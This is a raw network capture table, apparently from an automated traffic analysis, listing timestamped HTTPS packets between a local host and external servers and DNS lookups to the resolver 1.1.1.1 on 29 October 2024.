                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.428136110 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.428522110 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.428544044 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.428942919 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.429272890 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.429347992 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.429471016 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.429505110 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.429552078 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.430068016 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.430339098 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.430352926 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.431435108 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.431523085 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.431946039 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.432030916 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.432106018 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.432120085 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.477571964 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.559828997 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.559911966 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.559976101 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.561034918 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.561054945 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583703041 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583769083 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583812952 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583830118 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583843946 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583887100 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583889961 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583900928 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583950996 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.583960056 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.584187984 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.584234953 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.584244013 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.634483099 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.634497881 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.682605982 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.948684931 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.948776007 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.948811054 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.948844910 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.948905945 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.949002028 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.949045897 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.949045897 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.949111938 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.949522972 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.949542046 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.958926916 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.958970070 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.959058046 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.960124016 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.960140944 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.036240101 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.036753893 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.036786079 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.037188053 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.037520885 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.037597895 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.037808895 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.037836075 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.281971931 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.282053947 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.282140970 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.283380985 CET49978443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.283405066 CET4434997863.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.288595915 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.288636923 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.288706064 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.289943933 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.289958000 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.111196995 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.111615896 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.111634016 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.111979961 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.112477064 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.112530947 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.112747908 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.112765074 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.358678102 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.358768940 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.358891010 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.359961033 CET49982443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:40.359982014 CET4434998263.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:44.359426022 CET49990443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:44.359450102 CET44349990142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:44.359530926 CET49990443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:44.359785080 CET49990443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:44.359798908 CET44349990142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.227030039 CET44349990142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.227329969 CET49990443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.227348089 CET44349990142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.227802992 CET44349990142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.228219032 CET49990443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.228305101 CET44349990142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:45.272500992 CET49990443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:39.404544115 CET53592171.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:39.468796968 CET53540911.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.286384106 CET5551153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.286537886 CET5485953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.297902107 CET53548591.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.297930956 CET53555111.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.756624937 CET53553751.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.162343979 CET5404053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.162594080 CET5510153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.169984102 CET53540401.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.171138048 CET53551011.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.177406073 CET5598853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.177582979 CET5657853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.178042889 CET6507153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.178200006 CET5330053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.185992956 CET53565781.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.186285973 CET53559881.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.186724901 CET53650711.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.187475920 CET53533001.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531177998 CET5265553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531177998 CET5891453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531452894 CET6189153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531574011 CET5322253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.539237976 CET53532221.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.540298939 CET53618911.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.558465958 CET53526551.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.558845043 CET53589141.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.312211990 CET5607953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.312347889 CET4992553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.329476118 CET53560791.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.343025923 CET5475053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.343175888 CET6272953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.345087051 CET53499251.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.346982002 CET6415453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.347131014 CET6473553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.350300074 CET53547501.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.351525068 CET53627291.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.354446888 CET53647351.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.354583025 CET53641541.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.360510111 CET5093653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.360646963 CET5310553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.368632078 CET53531051.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.368772984 CET53509361.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.408469915 CET6411553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.408632040 CET5684153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.416667938 CET53568411.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.416893959 CET53641151.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.054516077 CET6148453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.054662943 CET5712453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.063481092 CET53614841.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.064065933 CET53571241.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089080095 CET5612653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089339972 CET6431253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.097043991 CET53643121.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.097740889 CET53561261.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.203504086 CET5735953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.203649998 CET5554653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212090969 CET5623753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212269068 CET5504753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212737083 CET53573591.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212760925 CET53555461.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.220213890 CET53550471.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.220758915 CET53562371.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225063086 CET53527321.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.030293941 CET5352853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.030473948 CET5928653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.037750006 CET53592861.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.037976980 CET53535281.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.245495081 CET6339753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.245784998 CET5442653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.253452063 CET53633971.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.253952980 CET53544261.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.934137106 CET5194753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.934288979 CET5314753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.948972940 CET53519471.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.343012094 CET53531471.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.111865997 CET4928953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.112010956 CET5405753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.112271070 CET5203253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.112700939 CET5028853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.119895935 CET53540571.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120419025 CET53492891.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120532036 CET53520321.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120543957 CET53502881.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.737811089 CET53503431.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.283071995 CET6505153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.283246994 CET5575453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.290477991 CET53557541.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.290894032 CET53650511.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.511486053 CET6539653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.511756897 CET5035653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.518651009 CET53653961.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.519337893 CET53503561.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.443931103 CET5485653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.444130898 CET5024053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.451257944 CET53548561.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.451379061 CET53502401.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.490668058 CET5146253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.490834951 CET6081853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.498347998 CET53514621.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.498442888 CET53608181.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.550038099 CET53547961.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.545638084 CET53603801.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:39.402091026 CET53600661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:39.480571032 CET53642151.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.034671068 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.557523966 CET6193053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.557714939 CET5361853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.565809011 CET53536181.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.566344023 CET53619301.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.590739965 CET5140653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.590898991 CET4934653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.598484993 CET53493461.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.598506927 CET53514061.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.691382885 CET53510561.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.345390081 CET5195153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.345601082 CET5120253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.377962112 CET53512021.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.390043974 CET53519511.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.512983084 CET5901353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.513144970 CET6499653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.513401985 CET6382453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.513510942 CET5312653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.553026915 CET53649961.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.795748949 CET53590131.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090084076 CET5598253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090390921 CET5930953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090708971 CET6027453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090847015 CET6361353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.091206074 CET5131253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.091418982 CET6551253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.098115921 CET6177453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.098264933 CET6106053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.103173018 CET5398753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.103310108 CET5823353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.104634047 CET53655121.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.105642080 CET5385653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.105777979 CET5167553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.108959913 CET6192753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.109128952 CET5046953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.111393929 CET53539871.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.111546993 CET53582331.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.113384008 CET6193653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.113622904 CET5130353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.122006893 CET53513031.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.218211889 CET5653753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.218400002 CET6271353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:20.179140091 CET5074053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:20.179284096 CET6144053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.408756018 CET5058853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.408900976 CET5965253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.415436029 CET5194953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.415591955 CET5906953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET53519491.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422960997 CET53590691.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.672075033 CET6228853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.672224045 CET6036853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.687611103 CET6481053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.687875986 CET5826153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.797816992 CET6031653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.798037052 CET6078853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.818875074 CET6375653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.819027901 CET5137253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.262459040 CET5470953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.262731075 CET6288953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.611432076 CET5109353192.168.2.161.1.1.1
